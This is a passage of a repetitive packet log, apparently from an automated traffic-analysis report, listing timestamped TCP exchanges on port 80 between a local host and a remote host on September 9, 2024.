                                              Sep 9, 2024 17:49:13.868222952 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.868232012 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.868236065 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.868244886 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.868868113 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.868891001 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.868906975 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.868951082 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.868963003 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.868973970 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.868988037 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.882524967 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.882548094 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.882559061 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.882597923 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.882627010 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.882638931 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.882677078 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.882693052 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.882704973 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.882735014 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.882819891 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.882831097 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.882841110 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.882853031 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.882858992 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.882863998 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.882884979 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.883095980 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.883106947 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.883116961 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.883130074 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.883136988 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.883141994 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.883155107 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.883163929 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.883166075 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.883177996 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.883186102 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.883189917 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.883203030 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.883208990 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.883236885 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.883409023 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.883420944 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.883430958 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.883454084 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.883457899 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.883471012 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.883481026 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.883492947 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.883498907 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.883506060 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.883517027 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.883527040 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.883527994 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.883548975 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.883752108 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.883773088 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.883785009 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.883790970 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.883796930 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.883809090 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.883817911 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.883821011 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.883832932 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.883843899 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.883882046 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.884073019 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.884084940 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.884095907 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.884107113 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.884113073 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.884119034 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.884130001 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.884139061 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.884143114 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.884161949 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.884329081 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.884341002 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.884351969 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.884362936 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.884368896 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.884373903 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.884383917 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.884386063 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.884397984 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.884433985 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.884638071 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.884656906 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.884668112 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.884679079 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.884689093 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.884689093 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.884701967 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.884710073 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.884712934 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.884726048 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.884736061 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.884737968 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.884749889 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.884757042 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.884762049 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.884773016 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.884779930 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.884783983 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.884795904 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.884804010 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.884809017 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.884828091 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.885251999 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.885263920 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.885273933 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.885284901 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.885289907 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.885296106 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.885303020 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.885308981 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.885320902 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.885325909 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.885332108 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.885344028 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.885349989 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.885354996 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.885369062 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.885375977 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.885401964 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.885584116 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.885596037 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.885606050 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.885616064 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.885627031 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.885637045 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.885643005 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.885649920 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.885662079 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.885672092 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.885683060 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.885685921 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.885694981 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.885700941 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.885709047 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.885723114 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.885725021 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.885754108 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.886145115 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.886157036 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.886167049 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.886177063 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.886185884 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.886187077 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.886198997 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.886208057 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.886210918 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.886224031 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.886230946 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.886235952 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.886248112 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.886254072 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.886259079 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.886270046 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.886279106 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.886281967 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.886300087 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.886495113 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.886507034 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.886521101 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.886531115 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.886531115 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.886564016 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.975265980 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.975282907 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.975295067 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.975317955 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.975327969 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.975339890 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.975339890 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.975352049 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.975364923 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.975373983 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.975382090 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.975382090 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.975430965 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.975474119 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.975485086 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.975516081 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.975522995 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.975542068 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.975553036 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.975564003 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.975575924 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.975575924 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.975588083 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.975589991 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.975601912 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.975622892 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.975760937 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.975794077 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.975812912 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.975824118 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.975856066 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.975950003 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.975960970 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.975971937 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.975985050 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.975990057 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.975996971 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.976022959 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.976190090 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.976201057 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.976212025 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.976222992 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.976232052 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.976234913 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.976253033 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.976273060 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.976284981 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.976294994 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.976305008 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.976310968 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.976317883 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.976336002 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.976531029 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.976550102 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.976561069 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.976568937 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.976571083 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.976583004 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.976591110 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.976593018 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.976603985 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.976613998 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.976613998 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.976625919 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.976635933 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.976638079 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.976656914 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.976970911 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.976980925 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.976990938 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.977003098 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.977011919 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.977013111 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.977025032 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.977032900 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.977039099 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.977058887 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.977113008 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.977123976 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.977134943 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.977154970 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.977235079 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.977246046 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.977256060 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.977267027 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.977273941 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.977277994 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.977288008 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.977293015 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.977297068 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.977298975 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.977344990 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.977690935 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.977701902 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.977711916 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.977722883 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.977732897 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.977732897 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.977744102 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.977746964 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.977756023 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.977766037 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.977776051 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.977776051 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.977787018 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.977792025 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.977798939 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.977952957 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.977976084 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.977987051 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.977998972 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.978008032 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.978019953 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.978044033 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.978260994 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.978271961 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.978287935 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.978298903 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.978308916 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.978311062 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.978321075 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.978327990 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.978332043 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.978343010 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.978353024 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.978354931 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.978363991 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.978369951 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.978375912 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.978385925 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.978396893 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.978398085 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.978409052 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.978415012 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.978421926 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.978444099 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.978786945 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.978796959 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.978806973 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.978816986 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.978827000 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.978828907 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.978837967 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.978847027 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.978848934 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.978861094 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.978868961 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.978873014 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.978882074 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.978889942 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.978943110 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.979136944 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.979151964 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.979162931 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.979172945 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.979183912 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.979203939 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.979204893 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.979204893 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.979219913 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.979237080 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:14.083544016 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:14.083581924 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:14.083592892 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:14.083599091 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:14.083609104 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:14.083619118 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:14.083638906 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:14.083648920 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:14.083659887 CEST8049169185.235.137.223192.168.2.22
